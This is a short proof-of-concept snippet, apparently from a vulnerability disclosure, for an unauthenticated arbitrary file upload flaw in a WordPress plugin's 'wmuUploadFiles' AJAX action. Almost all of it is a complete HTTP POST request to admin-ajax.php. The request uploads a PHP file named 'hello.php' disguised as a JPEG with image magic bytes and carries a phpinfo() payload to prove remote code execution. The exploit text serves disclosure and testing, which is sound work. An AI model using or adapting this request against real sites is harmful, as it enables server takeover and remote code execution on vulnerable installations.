This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: URL
Content-Length: 774
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
Origin: http://URL
Referer: http://URL
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
Connection: close
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="action"
wmuUploadFiles
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_nonce"
aede3ab0b2
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php"
Content-Type: image/jpeg
ÿØÿájExifMM*i>¨ÀÿàJFIFÿÛC
<?php phpinfo();?>
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="postId"
393
------WebKitFormBoundaryUGWBOKSwsalnzhha--